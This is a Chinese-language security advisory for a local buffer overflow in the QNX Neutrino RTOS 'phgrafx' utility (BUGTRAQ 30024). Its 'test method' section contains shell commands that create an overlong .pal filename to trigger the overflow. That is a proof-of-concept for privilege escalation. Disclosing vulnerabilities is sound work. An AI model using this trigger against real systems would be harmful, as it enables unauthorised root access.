BUGTRAQ ID: 30024
CNCAN ID：CNCAN-2008070203
 
漏洞消息时间:2008-07-01
 
漏洞起因
边界条件错误
 
影响系统
QNX RTOS 6.3.2
QNX RTOS 6.3
 
不受影响系统
 
危害
本地攻击者可以利用漏洞以系统用户进程权限执行任意指令。
 
攻击所需条件
攻击者必须访问QNX Neutrino RTOS。
 
漏洞信息
QNX Neutrino RTOS是一款QNX Neutrino嵌入式实时操作系统。
QNX Neutrino RTOS 'phgrafx'工具存在一个缓冲区溢出，本地攻击者可以利用漏洞以系统用户进程权限执行任意指令。
问题存在于'phgrafx'工具处理PHOTON_PATH/palette/*.pal文件，当在"palette"目录中的.pal扩展建立一个超过285字符的文件名时，执行'phgrafx'可触发缓冲区溢出，可导致以超级用户进程权限执行任意指令。
 
测试方法
# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
 
厂商解决方案
目前没有解决方案提供：
http://www.qnx.com/
 
漏洞提供者
Filipe Balestra and Rodrigo Rubira Branco
 
漏洞消息链接
http://www.scanit.net/rd/advisories/adv01
 
漏洞消息标题
SCANIT-2008-001 QNX phgrafx Privilege Escalation Vulnerability